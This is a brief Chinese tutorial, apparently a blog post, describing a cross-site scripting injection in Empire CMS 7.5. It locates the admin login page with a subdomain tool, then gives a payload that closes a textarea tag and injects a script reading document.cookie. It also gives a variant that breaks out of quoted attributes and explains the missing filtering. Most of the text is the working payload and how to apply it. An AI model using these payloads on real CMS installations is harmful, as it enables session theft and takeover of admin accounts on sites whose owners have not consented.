Empire(帝国)CMS 7.5 XSS注入

利用子域名挖掘工具,获取管理员登录页面:

登录管理员页面:

payload:

</textarea>

<script>alert(document.cookie)

</script>

思路分析:

这块只做了前方</textarea>标签闭合,没有过滤<script>标签和大小写,所以只要闭合了文本域标签,其它的payload内容也可以。

正常HTML的文本框:

<textarea ...>

【你的输入】

</textarea>

通过强行闭合文本域并做大小写变体标签:

<textarea ...>

</textarea><script>alert(document.cookie)</script>

</textarea>

也可以追加 '> 是为了兼容属性值闭合(如果你的输入被包裹在引号里,这部分可以把属性也闭合掉),

<textarea ...> </textarea>'> <script>alert(document.cookie)</script> </textarea>

相关推荐
狒狒热知识1 分钟前
178软文网软文营销平台完善多层风控体系护航企业稳健安全传播
大数据·人工智能·安全
山河木马2 分钟前
无框架-原生webGL渲染-底层入门-1
前端·javascript·webgl
jingling5552 分钟前
Flutter | 商城项目鸿蒙(OpenHarmony)适配实战
android·开发语言·前端·flutter·华为·harmonyos
郝学胜_神的一滴3 分钟前
系统设计 014:缓存深度实战:如何用 Cache 优雅优化数据库读写?
前端·后端·面试
光影少年5 分钟前
react状态管理
前端·react.js·前端框架
小李云雾5 分钟前
深入浅出 Vue 3 核心知识点:从基础到实战
前端·javascript·vue.js·程序人生
小雨下雨的雨6 分钟前
房产登记交易系统鸿蒙PC Electron框架技术实现详解
前端·华为·electron·harmonyos·鸿蒙·鸿蒙系统
Cobyte8 分钟前
16.响应式系统比对:链表如何实现 computed 的高效更新
前端·javascript·vue.js
踩着两条虫8 分钟前
开源 AI 低代码平台 VTJ.PRO 双版本齐发:核心引擎 v0.17.1 与在线平台 v2.4.1 正式上线,强化团队协作与 AI 资产管理
前端·人工智能·低代码·架构·开源
铁皮饭盒13 分钟前
sharp.js安装不上, Bun.Image说: 我不用安装
前端·后端